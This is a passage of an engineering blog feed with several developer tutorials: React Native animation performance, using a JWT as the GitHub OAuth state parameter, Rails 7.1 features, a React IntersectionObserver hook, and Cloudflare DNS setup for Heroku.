rerenders.</p><pre><code class="language-jsx">const LottieAnimated = Animated.createAnimatedComponent(Lottie);const [progress, setProgress] = useState(0);const lottieAnimatedProps = useAnimatedProps(() =&gt; progress: x.value / width);const gestureHandler = useAnimatedGestureHandler({  onStart: (event, ctx) =&gt; {    x.value = event.absoluteX;  },  onActive: (event, ctx) =&gt; {    x.value = event.absoluteX;  },});&lt;LottieAnimated  style={{    alignSelf: &quot;center&quot;,    width: &quot;100%&quot;,  }}  animatedProps={lottieAnimatedProps}  source={require(&quot;./progress&quot;)}  autoPlay={false}  loop={false}/&gt;;</code></pre><h3>Conclusion</h3><p>With the first approach, whenever the slider moves, the UI thread will pass thegesture event to the JS thread to store the <code>progress</code> value in react state, andwhen the <code>progress</code> value changes in the JS thread, it causes a re-render. Thisapproach creates a lot of traffic over<a href="https://reactnative.dev/architecture/threading-model">Communication Bridge</a>because of the message exchange between UI and JS threads.</p><p>So we should prefer the second approach to run any calculations on the UI threadinstead of the JS thread. Here is the entire code for reference:</p><pre><code class="language-jsx">let approach1ReRenderCount1 = 0;const Approach1: () =&gt; Node = () =&gt; {  const [width, setWidth] = useState(1);  const x = useSharedValue(0);  const [progress, setProgress] = useState(0);  const gestureHandler = useAnimatedGestureHandler({    onStart: (event, ctx) =&gt; {      x.value = event.absoluteX;    },    onActive: (event, ctx) =&gt; {      x.value = event.absoluteX;      runOnJS(setProgress)(x.value / width);    },  });  const animatedStyle = useAnimatedStyle(() =&gt; {    return {      transform: [        {          translateX: x.value,        },      ],    };  });  return (    &lt;SafeAreaView&gt;      &lt;View        style={{          height: 150,          paddingHorizontal: 20,          borderWidth: 1,          margin: 10,          justifyContent: &quot;center&quot;,        }}        onLayout={({          nativeEvent: {            layout: { width },          },        }) =&gt; {          setWidth(width);        }}      &gt;        &lt;Text style={{ fontSize: 20, paddingBottom: 10 }}&gt;Approach 1&lt;/Text&gt;        &lt;Text style={{ fontSize: 20 }}&gt;          Rerender Count : {approach1ReRenderCount1++}        &lt;/Text&gt;        &lt;View style={{ height: 20, marginTop: 10 }}&gt;          &lt;LottieAnimated            style={{              alignSelf: &quot;center&quot;,              width: &quot;100%&quot;,            }}            progress={progress}            source={require(&quot;./progress&quot;)}            autoPlay={false}            loop={false}          /&gt;        &lt;/View&gt;        &lt;PanGestureHandler onGestureEvent={gestureHandler}&gt;          &lt;Animated.View style={[{ height: 20 }]}&gt;            &lt;Animated.View              style={[                {                  backgroundColor: &quot;blue&quot;,                  height: 20,                  width: 20,                  borderRadius: 10,                },                animatedStyle,              ]}            /&gt;            &lt;View              style={{                backgroundColor: &quot;black&quot;,                height: 2,                width: &quot;100%&quot;,                position: &quot;absolute&quot;,                top: 10,              }}            /&gt;          &lt;/Animated.View&gt;        &lt;/PanGestureHandler&gt;      &lt;/View&gt;    &lt;/SafeAreaView&gt;  );};const LottieAnimated = Animated.createAnimatedComponent(Lottie);let approach2ReRenderCount = 0;const Approach2: () =&gt; Node = () =&gt; {  const [width, setWidth] = useState(1);  const x = useSharedValue(0);  const lottieAnimatedProps = useAnimatedProps(() =&gt; progress: x.value / width);  const gestureHandler = useAnimatedGestureHandler({    onStart: (event, ctx) =&gt; {      x.value = event.absoluteX;    },    onActive: (event, ctx) =&gt; {      x.value = event.absoluteX;    },  });  const animatedStyle = useAnimatedStyle(() =&gt; {    return {      transform: [        {          translateX: x.value,        },      ],    };  });  return (    &lt;SafeAreaView&gt;      &lt;View        style={{          height: 150,          paddingHorizontal: 20,          borderWidth: 1,          margin: 10,          justifyContent: &quot;center&quot;,        }}        onLayout={({          nativeEvent: {            layout: { width },          },        }) =&gt; {          setWidth(width);        }}      &gt;        &lt;Text style={{ fontSize: 20, paddingBottom: 10 }}&gt; Approach 2&lt;/Text&gt;        &lt;Text style={{ fontSize: 20 }}&gt;          Rerender Count : {approach2ReRenderCount++}        &lt;/Text&gt;        &lt;View style={{ height: 20, marginTop: 10 }}&gt;          &lt;LottieAnimated            animatedProps={lottieAnimatedProps}            style={{              alignSelf: &quot;center&quot;,              width: &quot;100%&quot;,            }}            source={require(&quot;./progress&quot;)}            autoPlay={false}            loop={false}          /&gt;        &lt;/View&gt;        &lt;PanGestureHandler onGestureEvent={gestureHandler}&gt;          &lt;Animated.View style={[{ height: 20 }]}&gt;            &lt;Animated.View              pointerEvents=&quot;none&quot;              style={[                {                  backgroundColor: &quot;blue&quot;,                  height: 20,                  width: 20,                  borderRadius: 10,                },                animatedStyle,              ]}            /&gt;            &lt;View              pointerEvents=&quot;none&quot;              style={{                backgroundColor: &quot;black&quot;,                height: 2,                width: &quot;100%&quot;,                position: &quot;absolute&quot;,                top: 10,              }}            /&gt;          &lt;/Animated.View&gt;        &lt;/PanGestureHandler&gt;      &lt;/View&gt;    &lt;/SafeAreaView&gt;  );};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[How to use JWT to secure your GitHub OAuth callback endpoint]]></title>
       <author><name>Jagannath Bhat</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint"/>
      <updated>2023-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint</id>
      <content type="html"><![CDATA[<p>JSON Web Tokens (JWTs) have become a popular way to manage user authenticationand authorization. In this blog, we will explore how to use JWTs in GitHub OAuthprocess, including how to encode additional parameters in the JWT to improve thesecurity and functionality of your GitHub OAuth integration. Let's start bylooking into what OAuth is.</p><h2>OAuth 2.0</h2><p>OAuth 2.0 is an authorization framework that enables an application to accessdata from a server on behalf of a user. For example, OAuth enables applicationsto access data from Google, Facebook, GitHub, etc., on behalf of users havingaccounts in that service.</p><p>Let's say you have an application that requires access to a user's data onGitHub. The following are the steps involved in authorizing your applicationwith GitHub:</p><ol><li><p>The application requests authorization from GitHub. The following are some ofthe parameters this request should contain:</p><ul><li><code>client_id</code> - This is an ID used by GitHub for identifying the application.You need to register your application with GitHub to get this ID.</li><li><code>redirect_uri</code> - The URI to which GitHub should send back a request oncethe authorization is approved.</li><li><code>login</code> - This is a username on GitHub. The application requires access todata on behalf of the user with this username.</li><li><code>state</code> - This should ideally be a string of random characters. Store thisstring in memory because it will be used in another step. This parameter isoptional but highly recommended. We'll look into why later.</li></ul></li><li><p>GitHub then asks the user to grant the authorization. The user might beprompted to log in to GitHub if they have not already logged in. Then GitHubdisplays information on the application and lists all the data theapplication wants to access. If the user denies authorization, the processends here. If the user approves, we move on to the next step.</p></li><li><p>GitHub sends a request to the application through the URI passed as<code>redirect_uri</code> in the first step. This request will contain a <code>code</code>parameter that serves as a temporary authorization code and a <code>state</code>parameter.</p></li><li><p>The OAuth process must be dropped immediately if the value of the <code>state</code>parameter from the previous step does not match the random string stored inmemory in step 1. This ensures that the OAuth process was initiated by yourapplication. We'll look more into this later.</p></li><li><p>The application should send another request to GitHub to generate a permanentauthentication token. This request should contain the <code>code</code> sent by GitHubin step 3.</p></li><li><p>GitHub responds with an authentication token that can be used by theapplication to access data on behalf of the user.</p></li></ol><p><img src="/blog_images/2023/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint/github_oauth_process.png" alt="GitHub OAuth process"></p><h2>The state parameter</h2><p>The <code>state</code> parameter plays a crucial role in ensuring that the GitHub OAuthprocess was initiated by your application or a trusted source. An unauthorizedthird party could pose as your application by using your <code>client_id</code>. The valueof <code>client_id</code> is not exactly a secret. GitHub treats any OAuth processinitiated using your ID as an OAuth process started by your application.</p><p>Let's see how the OAuth process would play out when initiated by an unauthorizedthird party:</p><ol><li><p>Third-party requests authorization from GitHub. The third party would passyour ID as <code>client_id</code>. This would lead GitHub to believe the request is fromyour application. The third party may or may not pass a <code>state</code> parameter.</p></li><li><p>GitHub then asks the user to grant the authorization. If the third party usesone of their own accounts, they could grant the authorization. The thirdparty could also convince a user to grant permission using socialengineering. For example, they could perform a phishing attack using an emaildesigned to trick the user into believing that the email was from yourapplication.</p></li><li><p>GitHub sends a request to the application through the URI passed as<code>redirect_uri</code> in the first step. This request would contain the <code>code</code>parameter, and the <code>state</code> parameter if it was passed in step 1.</p></li><li><p>It would be clear that the process was not initiated by your application ifthe <code>state</code> parameter is missing. Even if there was a <code>state</code> parameter, itwould not be found in memory. This is because the state parameter wasgenerated by a third party and not your application. Only those stateparameters generated by your application will be found in your memory.</p></li></ol><h2>JSON Web Tokens</h2><p>JSON Web Tokens (JWT) is a structured format that contains header, payload, andsignature components. Let's take a look at the significance of these components:</p><ol><li><p><strong>Header</strong> - The header is a JSON string that typically contains the signingalgorithm used, such as HMAC, SHA256, or RSA.</p></li><li><p><strong>Payload</strong> - The payload is a JSON string that contains claims andadditional data. Claims can be used to enforce security constraints andvalidate the authenticity of the token and its contents. For example, aclaims can specify the token expiration time. The expiration time, mostcommonly represented by <code>exp</code>, represents the date and time after which thetoken will no longer be considered valid.</p></li><li><p><strong>Signature</strong> - The signature is used to verify that the sender of the JWT iswho it says it is and to ensure that the token has not been tampered withalong the way. Just like the hand signature of a person, it is hard to forgea JWT signature. (Digital signatures are significantly harder to forgecompared to a person's hand signature)</p></li></ol><h3>Generating a JWT</h3><p>The following steps outline the process of generating a JWT:</p><ol><li><p>The header and the payload of the JWT are first encoded using Base64encoding. So now we have two strings - the encoded header and the encodedpayload.</p></li><li><p>The encoded header and the encoded payload are concatenated into a singlestring, with dots (.) separating each part. The concatenated string is signedusing the signing algorithm specified in the header. The signing algorithmuses a secret key, that is known only to the issuer (your application), whichensures that only the issuer can generate a valid signature. The result ofthe signing process is a signature, which is also a string.</p></li><li><p>The encoded header, the encoded payload, and the signature are concatenatedinto a single string, with dots (.) separating each part. The resultingstring is the JWT, which can be transferred securely between parties.</p></li></ol><p>For example, let's say we have the following header:</p><pre><code class="language-json">{ &quot;alg&quot;: &quot;RS256&quot; }</code></pre><p>The value of <code>alg</code> contains the algorithm used for signing the JWT. Also, let'ssay we have the following payload:</p><pre><code class="language-json">{ &quot;username&quot;: &quot;sam@example.com&quot;, &quot;exp&quot;: 1676263763 }</code></pre><p>The <code>username</code> is data that needs to be transferred. <code>exp</code> contains theexpiration time claim of the JWT.</p><p>When both these components are encoded, we get:</p><ul><li>Header - &quot;eyJhbGciOiJSUzI1NiJ9&quot;</li><li>Payload - &quot;eyJ1c2VyIjoic2FtQGV4YW1wbGUuY29tIiwiZXhwIjoxNjc2MjYzNzYzfQ&quot;</li></ul><p>When these are signed using the RS256 algorithm and a secret key, a signature isproduced. The following signature was generated using the RS256 algorithm and asecret key (which will remain secret):</p><pre><code class="language-text">NlAT6awp68dCEcFXbDeeLTzZekqUmB3f6kr3jkGSFmrKa5zvLmFGeraWba_fUuQLVhRtcXUPZbRR1DKnKH0HVf1rRDvOqezwbhe-hR1wlz6vZkHuPjtYSCLx_aybGm7dy2ijfTQwYd14cD9ZiMI5vf6XcDDfE7mkhu0ogCOnqR1v3KOEWJkMkvGBHfHKuf9FKYbWltHtUE6bAEO1orq0JayD8UNUKxdGkElXA7mkuIEexmBuieG9PJ2ow_uo05QCsqDvxlzOCMMIe7WdT7gmz4myiZ7lVuUcL1V2-Y1PJqWDyqDZbKNxd4X_CwW0RLOF1pw9S2URgybqHZFG0murNw</code></pre><p>So the final JWT would be:</p><p><img src="/blog_images/2023/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint/jwt_decoded.png" alt="Screenshot of decoded JWT"></p><p>The image above was captured from the decoding tool in<a href="https://jwt.io/">jwt.io</a>.</p><p>JWT is basically a Base64 encoded string with a signature attached to it. Havingthat signature component makes JWT a secure format for transferring data. It ispossible to simply encode data with Base64 and transfer that string. From theexample above, transferring the encoded payload&quot;eyJ1c2VyIjoic2FtQGV4YW1wbGUuY29tIiwiZXhwIjoxNjc2MjYzNzYzfQ&quot; can also get thedata to the other party. However, the party that receives the data have no wayof ensuring that the data was sent by a trusted source and that the data was nottampered with along the way.</p><h3>Verifying JWT tokens</h3><p>Anyone who has the secret key used to sign a JWT, can verify the integrity ofthe JWT. The steps involved in verifying the signature of a JSON Web Token (JWT)are:</p><ol><li><p>Split the JWT into the encoded header, the encoded payload and the signature,using the dot (.) used to separate the three components.</p></li><li><p>Decode the encoded header and the encoded payload using Base64 to get theheader and payload JSON strings.</p></li><li><p>The application recreates the signature by signing the encoded header and theencoded payload using the signing algorithm in the header and the secret key.If the signature created in this step is the same as the signature in theJWT, the JWT is valid.</p></li><li><p>The application validates the claims in the payload if there are any.</p></li></ol><p>It can be verified that the JWT was generated by your application and has notbeen tampered with, if the signature is valid. If the JWT header or payload wastampered with, the signature produced while verifying would be different fromthe one in the JWT.</p><h2>Using JWT for the state parameter</h2><p>We can generate a JWT token and pass that as the state parameter in the GitHubOAuth authorizing process. Here's how the process will be different when usingJWT:</p><ol><li><p>The application requests authorization from GitHub. This time the <code>state</code>parameter will be a JWT signed using a secure algorithm and a secret key. TheJWT need not be stored in memory.</p></li><li><p>GitHub gets the approval of the user.</p></li><li><p>GitHub sends a request to the application through the URI passed as<code>redirect_uri</code> in the first step. This request will contain the <code>code</code> andthe <code>state</code> parameters. Here, the state parameter would be a JWT.</p></li><li><p>Validate the JWT from the <code>state</code> parameter. If the JWT is invalid, drop theauthorization process immediately.</p></li></ol><h2>Advantages of using JWT for the state parameter</h2><ol><li><p><strong>No Storage requirement</strong> - When using a random string for the stateparameter, that string has to be stored, so that it can be used later forverification. However, JWTs can be verified without storing them once theyare generated.</p></li><li><p><strong>Ability to send additional data</strong> - The payload component of JWT can beused to send additional data such as user data, permissions data, etc.</p></li><li><p><strong>Security</strong> - Using JWT can ensure that the OAuth process was initiated byyour application or a trusted source. In addition, JWT also ensures theintegrity of the data. This means that we can ensure that the payload in theJWT has not been tampered with.</p></li><li><p><strong>Flexibility</strong> - The claims in the payload component of JWT can be usedfurther enhance the security of the JWT by implementing custom securitychecks based on the claims in the payload.</p></li><li><p><strong>Standardization</strong> - JWT is a widely used format for transferring data.Using JWT would be beneficial when there are different applications andservices involved in the OAuth process.</p></li></ol><h2>References</h2><ol><li><p>OAuth 2.0 -<a href="https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2">https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2</a></p></li><li><p>GitHub OAuth Authorization process -<a href="https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps">https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps</a></p></li><li><p>Phishing Attack -<a href="https://www.imperva.com/learn/application-security/phishing-attack-scam/">https://www.imperva.com/learn/application-security/phishing-attack-scam/</a></p></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds ActiveJob.perform_all_later]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-activejob-perform-all-later"/>
      <updated>2023-02-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-activejob-perform-all-later</id>
      <content type="html"><![CDATA[<p>Rails 7.1 adds <code>ActiveJob.perform_all_later</code> to enqueue multiple jobs at once.This method accepts an array of job instances. Just like Active Record bulkmethods, <code>perform_all_later</code> doesn't run any callbacks.</p><p>For example, if we want to send a welcome email to multiple users, we can dothis:</p><pre><code class="language-ruby">welcome_email_jobs = users.map do |user|  WelcomeEmailJob.new(user)endActiveJob.perform_all_later(welcome_email_jobs)</code></pre><p>The benefit of doing it this way, rather than looping through the user recordsand using <code>perform_later</code> is that <code>perform_all_later</code> cuts down on the number ofround-trips to the queue datastore. That means reducing Redis round-trip latencyif the queuing backend is Sidekiq. Whereas if we're using a queuing backend like<a href="https://github.com/bensheldon/good_job">GoodJob</a>, which is backed by Postgres,<code>perform_all_later</code> will enqueue all the jobs using a single INSERT statementwhich is more performant.</p><p>Please note that if the queuing backend doesn't support bulk enqueuing,<code>perform_all_later</code> will fallback to enqueuing each job individually.</p><p>Active Job is designed to abstract away the differences between different jobprocessing libraries and to provide a unified interface. It is made possibleusing<a href="https://api.rubyonrails.org/classes/ActiveJob/QueueAdapters.html">adapters</a>.</p><p>The popular queuing backend Sidekiq already has a<a href="https://github.com/sidekiq/sidekiq/wiki/Bulk-Queueing">push_bulk</a> method.Hence, the author of this pull request has made<a href="https://github.com/rails/rails/pull/46603/files#diff-e1ee600ca5fd100da20810ef5acbab89546064fc323c7b1e6bdb6ed5e681a9d3">changes</a>to the Sidekiq adapter so that <code>perform_all_later</code> uses the <code>push_bulk</code> methodfrom Sidekiq.</p><p>Recently, GoodJob has also added support for bulk enqueuing in this<a href="https://github.com/bensheldon/good_job/pull/790">pull request</a>.</p><p>Practically, <code>ActiveJob.perform_all_later</code> is only useful if we want to pushthousands of jobs at once. For a smaller number of jobs, the performancebenefits will not be significant.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/46603">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds adapter option to disallow foreign keys]]></title>
       <author><name>Aditya Bhutani</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-adapter-option-to-disallow-foregin-keys"/>
      <updated>2023-02-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-adapter-option-to-disallow-foregin-keys</id>
      <content type="html"><![CDATA[<p>There are times when an application can choose <strong>not</strong> to use foreign keys. Datatransfer between services is a tricky thing. When we are importing the data, weneed to import the data in the right order if &quot;foreign keys&quot; are enabled. In suchcases one might want to not enforce &quot;foreign keys&quot; and load the data and thenadd &quot;foreign keys&quot; constraint back.</p><p>Situations like this can be handled using migrations. Using migrations, we candisable &quot;foreign keys&quot;. However, this would mean writing migrations for all thetables and removing all &quot;foreign keys&quot;. This could be cumbersome.</p><pre><code class="language-ruby">def change  create_table :authors do |t|    t.string :name    t.timestamps  end  create_table :books do |t|    t.belongs_to :author, foreign_key: false    t.datetime :published_at    t.timestamps  endend</code></pre><p>Rails 7.1 adds an option to database.yml that enables skipping foreign keyconstraints usage even if the underlying database supports them and solves theabove issue of writing migrations to disable foreign keys for all the tables.</p><pre><code class="language-yaml">development:  &lt;&lt;: *default  database: db/development.sqlite3  foreign_keys: false</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/45301">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows using aliased attributes with insert_all/upsert_all]]></title>
       <author><name>Aditya Bhutani</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-allows-using-aliased-attributes-with-insert_all-upsert_all"/>
      <updated>2023-01-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-allows-using-aliased-attributes-with-insert_all-upsert_all</id>
      <content type="html"><![CDATA[<p>Before Rails 6 we had update_all and delete_all. Rails 6 added insert_all andupsert_all.</p><p><a href="https://api.rubyonrails.org/classes/ActiveRecord/Persistence/ClassMethods.html#method-i-insert_all">insert_all</a>: This method can insert multiple records with a single SQL INSERT statement.</p><p><a href="https://api.rubyonrails.org/classes/ActiveRecord/Persistence/ClassMethods.html#method-i-upsert_all">upsert_all</a>: This method updates the records if they exist or inserts them into thedatabase with a single SQL INSERT statement.</p><p><a href="https://api.rubyonrails.org/classes/ActiveModel/AttributeMethods/ClassMethods.html#method-i-alias_attribute">alias_attribute</a>: Allows you to make aliases for attributes, which include a getter, a setter,and a predicate.</p><p>Rails 7.1 allows the use of aliased attributes with <code>insert_all</code> and <code>upsert_all</code>.Previously whenever we added an alias for an attribute, we couldn't use it forinsert_all and upsert_all.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  # database column is `name`. `full_name` is the alias.  alias_attribute :full_name, :nameend</code></pre><h3>Before Rails 7.1</h3><pre><code class="language-ruby"># rails console&gt; User.insert_all [{ full_name: &quot;John Doe&quot; }]=&gt; # unknown attribute 'full_name' for User. (ActiveModel::UnknownAttributeError)</code></pre><h3>After Rails 7.1</h3><pre><code class="language-ruby"># rails console&gt; User.insert_all [{ full_name: &quot;Jane Doe&quot; }]=&gt; # User Insert&gt; User.last=&gt; #&lt;User id: 6, name: &quot;Jane Doe&quot;, created_at: Mon, 21 Nov 2022 18:07:11.349000000 UTC +00:00, updated_at: Mon, 21 Nov 2022 18:07:11.349000000 UTC +00:00&gt;</code></pre><p>Now we can use the alias attribute with <code>insert_all</code> and <code>upsert_all</code>.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/45036">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to detect changes in component visibility when scrolling?]]></title>
       <author><name>Amaljith K</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-detect-changes-in-component-visibility-when-scrolling"/>
      <updated>2022-09-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-detect-changes-in-component-visibility-when-scrolling</id>
      <content type="html"><![CDATA[<p>When there is a need to display a large set of data, most of the web applicationssplit the whole set into several smaller chunks and then serve them on demand. Thistechnique is called pagination.</p><p>Earlier, pagination looked like this:</p><p><img src="https://user-images.githubusercontent.com/85148587/191435753-53aa1d13-3d55-42f2-b95d-922b6e0e3b7f.png" alt="image"></p><p>Here, loading the next set of data required the user to click on the next page button.</p><p>These days, we use the infinite scroll technique, which automatically loads the next setof data when the user scrolls to the bottom of the list. This is more user-friendly:</p><p><img src="https://user-images.githubusercontent.com/85148587/191432751-89eef3dc-5c5e-4939-8150-38dc98cee262.gif" alt="image"></p><p>Several JS libraries are available to facilitate infinite scroll. But to quenchour curiosity about how things work under the hood, it is best to try toimplement it from scratch.</p><p>To implement infinite scroll, we need to know when the user has scrolled to thebottom of the list to load the next page's data. To know if the user has reachedthe bottom, we can watch the last element of the list. That is, when the list isscrolled and the last element becomes visible, we know that we are at thebottom.</p><p>Detecting the visibility of elements during scroll was a hard problem untilrecently. We had to hook onto <code>onscroll</code> events of the element and check theboundaries of the elements using<a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/getBoundingClientRect">getBoundingClientRect</a>function.</p><p>Since <code>onscroll</code> event gets fired around 40-50 times per second, performing theoperations inside it will become expensive. Moreover, the <code>onscroll</code> functiongets executed from the main UI thread. All these together make our webapplication sluggish.</p><p>But now, we have a much more performant alternative for this problem.<a href="https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API#browser_compatibility">All popular web browsers</a>support a new API named<a href="https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API">IntersectionObserver</a>from 2019 onwards.</p><p>The advantages of <code>IntersectionObserver</code> API are:</p><ul><li>It doesn't grab the resources from the UI thread. It accepts a callbackfunction that will be fired <strong>asynchronously</strong>.</li><li>The supplied callback is triggered only when a change in visibility isdetected. We can save 40-50 repetitions per second during the scroll.</li><li>We don't need to worry about maintaining boilerplate code for detecting theboundaries &amp; calculating the visibility. We get all useful data as a parameterto the callback function.</li></ul><p>The introduction of <code>IntersectionObserver</code> simplified a whole set ofrequirements like:</p><ul><li>Infinite loading.</li><li>Improving page load time by not fetching resources (like images) that aren'tvisible until the user scrolls to it. This is called lazy loading.</li><li>Track whether the user has scrolled to and viewed an ad posted on the webpage.</li><li>UX improvements like dimming animation for the components that aren't fullyvisible.</li></ul><p>In this blog, we are going to discuss how we can use <code>IntersectionObserver</code> in aReact application as hooks.</p><h2>Creating a hook for detecting visibility changes</h2><p>We will create a custom hook that will update whenever the specified componentscrolls into view and scrolls out of view. Let us name the hook<code>useIsElementVisible</code>. Obviously, it will accept a reference to the component ofwhich visibility need to be monitored as its argument.</p><p>It will have a state to store the visibility status of the specified element. Itwill have a useEffect hook from which we will bind the <code>IntersectionObserver</code> tothe specified component.</p><p>Here is the basic implementation:</p><pre><code class="language-js">import { useEffect, useState } from &quot;react&quot;;const useIsElementVisible = target =&gt; {  const [isVisible, setIsVisible] = useState(false); // store visibility status  useEffect(() =&gt; {    // bind IntersectionObserver to the target element    const observer = new IntersectionObserver(onVisibilityChange);    observer.observe(target);  }, [target]);  // handle visibility changes  const onVisibilityChange = entries =&gt; setIsVisible(entries[0].isIntersecting);  return isVisible;};export default useIsElementVisible;</code></pre><p>We can use <code>useIsElementVisible</code> like this:</p><pre><code class="language-jsx">const ListItem = () =&gt; {  const elementRef = useRef(null); // to hold a reference to the component we need to track  const isElementVisible = useIsElementVisible(elementRef.current);  return (    &lt;div ref={elementRef} id=&quot;list-item&quot;&gt;      {/* your component jsx */}    &lt;/div&gt;  );};</code></pre><p>The component <code>ListItem</code> will get updated whenever the user scrolls to seethe div <code>&quot;list-item&quot;</code>. We can use the value of <code>isElementVisible</code> to load thecontents of the next page from a <code>useEffect</code> hook:</p><pre><code class="language-js">useEffect(() =&gt; {  if (isElementVisible &amp;&amp; nextPageNotLoadedYet()) {    loadNextPage();  }}, [isElementVisible]);</code></pre><p><strong>This works in theory.</strong> But if you try it, you will notice that this doesn'twork as expected. We missed an edge case.</p><h2>The real-life edge case</h2><p>We use a <code>useRef</code> hook for referencing the <code>div</code>. During the initial render,<code>elementRef</code> was just initialized with <code>null</code> as its value. So,<code>elementRef.current</code> will be null and as a result, the call<code>useIsElementVisible(elementRef.current)</code> won't attach our observer to theelement for the first time.</p><p>Unfortunately, useRef hook won't re-render when a value is set to it after DOMis prepared. Also, there are no state updates or anything that requests are-render inside our example component. In short, our component will render onlyonce.</p><p>With these in place, <code>useIsElementVisible</code> will never get a reference to the<code>&quot;list-item&quot;</code> div in our previous example.</p><p>But there is a workaround for our problem. We can force render the componenttwice during the first mount.</p><p>To make it possible, we will add a dummy state. When our hook is called for thefirst time (when <code>ListItem</code> mounts), we will update our state once, therebyrequesting React to repeat the component render steps again. During the secondrender, we will already have our DOM ready and we will have the target elementattached to <code>elementRef</code>.</p><h2>Force re-rendering the component</h2><p>To keep our code clean and modular, let us create a dedicated custom hook formanaging force re-renders:</p><pre><code class="language-js">import { useState } from &quot;react&quot;;const useForceRerender = () =&gt; {  const [, setValue] = useState(0); // we don't need the value of this state.  return () =&gt; setValue(value =&gt; value + 1);};export default useForceRerender;</code></pre><p>Now, we can use it in our <code>useIsElementVisible</code> hook this way:</p><pre><code class="language-js">const useIsElementVisible = target =&gt; {  const [isVisible, setIsVisible] = useState(false);  const forceRerender = useForceRerender();  useEffect(() =&gt; {    forceRerender();  }, []);  // previous code to register observer  return isIntersecting;};</code></pre><p>With this change, our hook is now self-sufficient and fully functional. In our<code>ListItem</code> component, <code>isElementVisible</code> will update to <code>false</code> and triggercomponent re-render whenever our <code>&quot;list-item&quot;</code> div goes outside visible zoneduring scroll. It will also update to <code>true</code> when it is scrolled into visibilityagain.</p><h2>Possible improvements on useIsElementVisible hook</h2><p>The <code>useIsElementVisible</code> hook shown in the previous sections serves only thebasic use case. It is not optimal to use in a production world.</p><p>These are the scopes for improvement for our hook:</p><ul><li>We can let in<a href="https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API#intersection_observer_options">configurations for IntersectionObserver</a>to customize its behavior.</li><li>We can prevent initializing observer when the <code>target</code> is not ready yet (whenit is <code>null</code>).</li><li>We can add a cleanup function to stop observing the element when our componentgets unmounted.</li></ul><p>Here is what the optimum code for the hook should look like:</p><pre><code class="language-js">import { useEffect, useState } from &quot;react&quot;;export const useForceRerender = () =&gt; {  const [, setValue] = useState(0); // we don't need the value of this state.  return () =&gt; setValue(value =&gt; value + 1);};export const useIsElementVisible = (target, options = undefined) =&gt; {  const [isVisible, setIsVisible] = useState(false);  const forceUpdate = useForceRerender();  useEffect(() =&gt; {    forceUpdate(); // to ensure that ref.current is attached to the DOM element  }, []);  useEffect(() =&gt; {    if (!target) return;    const observer = new IntersectionObserver(handleVisibilityChange, options);    observer.observe(target);    return () =&gt; observer.unobserve(target);  }, [target, options]);  const handleVisibilityChange = ([entry]) =&gt;    setIsVisible(entry.isIntersecting);  return isVisible;};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up Heroku DNS using cloudflare]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/setting-up-heroku-dns-using-clouflare"/>
      <updated>2022-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/setting-up-heroku-dns-using-clouflare</id>
      <content type="html"><![CDATA[<p>Lots of folks know <a href="https://www.cloudflare.com/">cloudflare</a> for the DDoSprotection, rate limiting etc services it provides. Here at BigBinary, we alsouse Cloudflare for DNS management.</p><p>DNS management is a free service by Cloudflare. However, on first glance, itmight not appear that it's a free service. Once we add a site, then we see ascreen like this. Here, we need to remember to scroll down to see the freeoption.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/pricing.png" alt="cloudflare pricing page"></p><p>Now let's see how we can map the DNS settings from Heroku to Cloudflare. We willlook at both a standard domain name and then we will take a look at a wildcarddomain name.</p><h3>Standard domain name</h3><p>We are hosting <a href="https://www.gitemit.com/">GitEmit</a> using Heroku. We are lettingHeroku manages the SSL for this domain.</p><p>After setting up domains in Heroku, here is what we see.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/heroku-dns-gitemit.png" alt="Heroku DNS gitemit"></p><p>In Cloudflare, we can set it up using two CNAMEs. It looks like this.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/cloudflare-heroku-gitemit.png" alt="Heroku DNS"></p><h3>Wild card domain name</h3><p>We are hosting <a href="https://www.neeto.com/neetochat/">NeetoChat</a> application usingHeroku.</p><p>Since it's a wild card domain, we had to<a href="https://www.bigbinary.com/blog/wild-card-ssl-on-heroku">generate the certificates</a>ourselves.</p><p>After setting up domains in Heroku, here is what we see.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/heroku-dns-neetochat.png" alt="Heroku DNS NeetoChat"></p><p>In Cloudflar,e we can set it up using three CNAMEs. It looks like this.</p><p><img 